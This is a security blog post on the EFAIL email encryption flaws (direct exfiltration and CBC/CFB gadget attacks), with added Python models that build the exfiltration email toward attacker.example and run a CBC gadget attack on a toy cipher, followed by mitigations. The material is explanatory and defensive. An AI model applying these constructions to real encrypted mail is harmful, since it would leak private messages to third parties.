The EFAIL OpenPGP & S/MIME vulnerabilities

Those who follow the security news could hardly have missed the release of the ‘EFAIL’ vulnerabilities this week. In brief, issues have been found with OpenPGP and S/MIME email encryption which can potentially expose the decrypted text of a message to attackers.

What are PGP and S/MIME?

The authors of the EFAIL paper cover this well, but ultimately email is a plaintext communication medium – much like the majority of pen and paper letters outside of spy films – and PGP and S/MIME are methods of encrypting the content of these messages.

It should be noted at this point that PGP and S/MIME serve a different purpose to TLS. The latter is a method of securing data in transit, hop by hop between mail servers and clients: once the email is stored on a server or arrives on the recipient’s machine it is no longer encrypted. PGP and S/MIME, on the other hand, secure the data at rest (and, as a by-product, provide an additional layer of security in transit). This is particularly desirable for anyone who is concerned about the security of their communications should, for example, their laptop be stolen – S/MIME is often used in enterprises for this very reason.

The EFAIL vulnerabilities

The full details of EFAIL are naturally provided by the authors, but the two variants both look at ‘tricking’ an email client into revealing the decrypted text of a message.

Separate CVE numbers have been assigned for the gadget attacks against OpenPGP (CVE-2017-17688) and S/MIME (CVE-2017-17689).

Direct exfiltration

The first vulnerability involves wrapping the encrypted text in a malformed HTML image tag: the attacker builds a new multipart email from an HTML part that opens an image tag with an unterminated source URL pointing at their own server, the captured ciphertext as the middle part, and an HTML part that closes the tag. After the email client has decrypted the email, the blob of decrypted content sits inside the source URL of the tag, so when the client renders the message it makes a request to the attacker’s server with the entire decrypted text in the URL – assuming the attacker controls the server receiving the request, they now have the full message (or at least the important bit) in plain text.

While this variant affects the popular Apple Mail and Mozilla Thunderbird clients, the good news is that it is theoretically fixable by patching the email clients, since the cryptography is never touched: the flaw is entirely in how the client stitches the decrypted part together with the attacker’s HTML.
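The three-part message described above, modelled end to end as an added example (this is not code from the Forcepoint post or from the EFAIL authors). The decryption step is a stand-in, because the attack leaves the cryptography alone and only abuses what the client does with the plaintext afterwards; the attacker host `attacker.example`, the ciphertext blob and the secret message text are constructed placeholders. Two client models are compared: one that renders all parts as a single HTML document (the vulnerable behaviour) and one that renders each MIME part as its own document, which is the kind of change that fixes this variant.

```python
# Added example: models EFAIL direct exfiltration with Python's email library.
# Not the original post's or the EFAIL authors' code; hosts, blob and secret
# are constructed placeholders.
import re
from email import message_from_string
from email.message import EmailMessage
from email.policy import default

ATTACKER = "http://attacker.example/"                  # placeholder host
SECRET = "Meet at 09:00, codeword PELICAN."            # constructed plaintext
# Placeholder for the victim's real ciphertext, previously captured by the attacker.
CAPTURED_BLOB = b"-----BEGIN PGP MESSAGE-----\n(captured ciphertext)\n-----END PGP MESSAGE-----\n"

ENCRYPTED_TYPES = ("application/pgp-encrypted", "application/pkcs7-mime")


def client_decrypt(blob):
    """Stand-in for the client's OpenPGP/S-MIME decryption. EFAIL does not
    break the cipher, so only the outcome is modelled here."""
    return SECRET if blob == CAPTURED_BLOB else "(decryption failed)"


def build_attack_mail():
    """Attacker side: HTML part opening an <img src=" with no closing quote,
    then the captured ciphertext, then an HTML part closing the tag."""
    msg = EmailMessage(policy=default)
    msg["From"] = "mallory@attacker.example"
    msg["To"] = "victim@example.org"
    msg["Subject"] = "Fwd: (no subject)"
    msg.make_mixed()
    head = EmailMessage(policy=default)
    head.set_content(f'<img src="{ATTACKER}', subtype="html")
    body = EmailMessage(policy=default)
    body.set_content(CAPTURED_BLOB, maintype="application", subtype="pgp-encrypted")
    tail = EmailMessage(policy=default)
    tail.set_content('">', subtype="html")
    for part in (head, body, tail):
        msg.attach(part)
    return msg.as_string()


# Minimal stand-in for "the renderer fetches every <img src=...>".
IMG_SRC = re.compile(r'<img[^>]*\ssrc="([^"]*)"', re.S)


def decrypted_parts(raw):
    """What the client has after decrypting: one string per MIME part."""
    msg = message_from_string(raw, policy=default)
    out = []
    for part in msg.iter_parts():
        if part.get_content_type() in ENCRYPTED_TYPES:
            out.append(client_decrypt(part.get_content()))   # bytes -> plaintext
        else:
            out.append(part.get_content())                   # already text
    return out


def vulnerable_client(raw):
    """Renders all parts as ONE HTML document: the plaintext lands inside the
    src attribute and the client requests it from the attacker's server."""
    return IMG_SRC.findall("".join(decrypted_parts(raw)))


def patched_client(raw):
    """Renders each part as its own document: the opening tag is never closed
    by the attacker's trailing part, so no request is made."""
    urls = []
    for doc in decrypted_parts(raw):
        urls += IMG_SRC.findall(doc)
    return urls


if __name__ == "__main__":
    raw = build_attack_mail()
    print("vulnerable client fetches:", vulnerable_client(raw))
    print("patched client fetches:   ", patched_client(raw))
```

Note that neither client ever needs the attacker to know anything about the key; the whole attack is that a trailing `">` from a different MIME part is allowed to terminate an attribute opened before the encrypted part.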

CBC/CFB gadget attack

The second variant is rather more technical. It relies on the combination of the predictable format of S/MIME emails in particular (the encrypted body starts with a known MIME header, which gives the attacker a block of known plaintext) with the malleability of the CBC and CFB block cipher modes used by S/MIME and OpenPGP: with a single known plaintext block, an attacker who does not have the key can rearrange and modify the ciphertext so that chosen blocks of plaintext appear in the decrypted output, separated by blocks of garbage. These ‘gadgets’ are used to build the same sort of image tag around the original ciphertext, so again, at the end of the day, the goal is to insert a malformed tag to fool the client into making an HTTP request containing the plain text of the message.

This variant is reportedly more effective against S/MIME than PGP encryption – OpenPGP’s modification detection code (MDC) lets a client notice that the ciphertext has been tampered with, provided the client treats an MDC failure as fatal rather than displaying the result anyway, whereas S/MIME encryption carries no such integrity check – but unfortunately it should work against any standard-compliant email client.
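The CBC gadget construction, worked through as an added example (this is not code from the Forcepoint post or from the EFAIL paper). A hash-based Feistel network stands in for AES, since the attack only depends on the CBC chaining and works against any block cipher; a minimal HTML parser stands in for the mail client; the message, IV, key and the hostname `a` are constructed placeholders. The attacker never uses the key: because CBC decryption computes P_i = D(C_i) XOR C_{i-1}, and D(C1) = P1 XOR IV is known once P1 is known, placing the block X = IV XOR P1 XOR chosen in front of C1 makes C1 decrypt to `chosen`, while X itself decrypts to garbage. The example also models the practical obstacle the paper deals with: the attacker cannot see the garbage, and a `"` inside it breaks the tag, so several variants are sent until one leaks.

```python
# Added example (not Forcepoint's or the EFAIL authors' code). A hash-based
# Feistel toy stands in for AES, a minimal HTML parser for the mail client,
# and host 'a' for an attacker-controlled server.
import hashlib
from html.parser import HTMLParser

BLOCK, ROUNDS = 16, 8


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key, rnd, half):                # Feistel round function, 8-byte output
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for rnd in range(ROUNDS):
        l, r = r, xor(l, _f(key, rnd, r))
    return l + r


def block_decrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for rnd in reversed(range(ROUNDS)):
        l, r = xor(r, _f(key, rnd, l)), l
    return l + r


def cbc_encrypt(key, iv, data):        # PKCS#7 padding; returns ciphertext blocks
    n = BLOCK - len(data) % BLOCK
    data += bytes([n]) * n
    prev, out = iv, []
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return out


def cbc_decrypt(key, iv, blocks):
    prev, out = iv, b""
    for c in blocks:
        out += xor(block_decrypt(key, c), prev)   # P_i = D(C_i) XOR C_{i-1}
        prev = c
    n = out[-1]
    if not 1 <= n <= BLOCK or out[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return out[:-n]


class ImgSrcs(HTMLParser):             # stand-in for the client's HTML renderer
    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.urls += [v for k, v in attrs if k == "src" and v]


def victim_client(key, iv, blocks):
    """Decrypts, renders, and returns the URLs it would fetch for <img> tags."""
    p = ImgSrcs()
    p.feed(cbc_decrypt(key, iv, blocks).decode("latin-1"))
    p.close()
    return p.urls


# Attacker-chosen 16-byte plaintext blocks; the last one carries valid padding.
OPEN_TAG, SRC_ATTR = b'<img ignore="   ', b'" src="http://a/'
CLOSE_TAG = b'">' + bytes([14]) * 14
assert len(OPEN_TAG) == len(SRC_ATTR) == len(CLOSE_TAG) == BLOCK


def build_gadget_ciphertext(iv, blocks, known_p1, y1, y2):
    """Key not needed: X = IV ^ P1 ^ chosen placed before C1 makes C1 decrypt
    to `chosen`; X decrypts to garbage. y1/y2 are free blocks whose only
    effect is to change the garbage. Returns (new IV, new ciphertext blocks)."""
    c1 = blocks[0]

    def x(chosen):
        return xor(xor(iv, known_p1), chosen)

    return x(OPEN_TAG), [c1, y1, x(SRC_ATTR), c1] + blocks[1:] + [y2, x(CLOSE_TAG), c1]


def run_attack(key, iv, blocks, known_p1, max_tries=40):
    """The attacker cannot see the garbage, so (as in the paper) variants are
    sent until one happens to contain no '"' that would break the tag."""
    for i in range(max_tries):
        y1 = hashlib.sha256(b"y1" + bytes([i])).digest()[:BLOCK]
        y2 = hashlib.sha256(b"y2" + bytes([i])).digest()[:BLOCK]
        new_iv, new_blocks = build_gadget_ciphertext(iv, blocks, known_p1, y1, y2)
        try:
            urls = victim_client(key, new_iv, new_blocks)
        except Exception:                  # client refused to render this variant
            continue
        for url in urls:
            if url.startswith("http://a/"):
                return i + 1, url          # (attempts used, leaked URL)
    return max_tries, None


def demo():
    key = hashlib.sha256(b"recipient key, never seen by the attacker").digest()
    iv = hashlib.sha256(b"iv").digest()[:BLOCK]
    # Constructed message; the first block is a predictable MIME header.
    plaintext = b"Content-Type: text/plain\r\n\r\nMeet at 09:00, codeword PELICAN."
    blocks = cbc_encrypt(key, iv, plaintext)
    return run_attack(key, iv, blocks, plaintext[:BLOCK])


if __name__ == "__main__":
    print(demo())
```

The leaked URL contains everything from the second plaintext block onwards (the known first block is sacrificed to host the gadget), including the original padding bytes, which a real client would simply percent-encode. CFB mode as used by OpenPGP gives the attacker the same kind of gadget; what differs there is the MDC, which a client can use to refuse the tampered message, hence the difference in effectiveness noted above.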

Protection & mitigation

It is worth noting that in both cases someone needs to have obtained a copy of your encrypted email to carry out the attack – by intercepting it in transit, or from a compromised mailbox, server or backup. This significantly reduces the likelihood of EFAIL becoming widespread, although for ‘high value’ targets such as politicians, journalists, etc. the risk is still serious.
Naturally, we recommend applying any vendor patches which may be released to counter these vulnerabilities as soon as they become available. In the meantime, there are steps that can be taken to try to minimise risk:

Disable HTML E-mail
– Often recommended by the security industry, disabling the rendering of HTML email will prevent your email client from parsing image links (among other things). While this doesn’t guarantee safety, it removes many potential avenues of attack within email content; if your client offers it, disable automatic loading of remote content as well, since images are only one of several ways an HTML renderer can be made to fetch a URL. Note that this is specifically disabling the viewing of HTML email which you have received, as opposed to merely changing the default format in which you write and send messages.

Disable automatic decryption in your email client
– Note that this does not mean stopping the use of PGP or S/MIME. It simply means that your email client no longer handles the decryption for you, so nothing it renders can contain your decrypted text; messages are decrypted in a separate tool instead. The EFF provide details on how to take this step in Thunderbird, Apple Mail, and iOS Mail.

As ever, Forcepoint Security Labs will continue to monitor for new developments and attacks in the wild.

Luke Somerville

Head of Special Investigations

Luke is responsible for supporting the business with in-depth technical analysis of major incidents such as the WannaCry and Petya outbreaks, and for overseeing longer-term research projects to identify and track new and advanced threats and attack methods. The research from Luke and his team…

Source: https://www.forcepoint.com/blog/x-labs/efail-openpgp-smime-vulnerabilities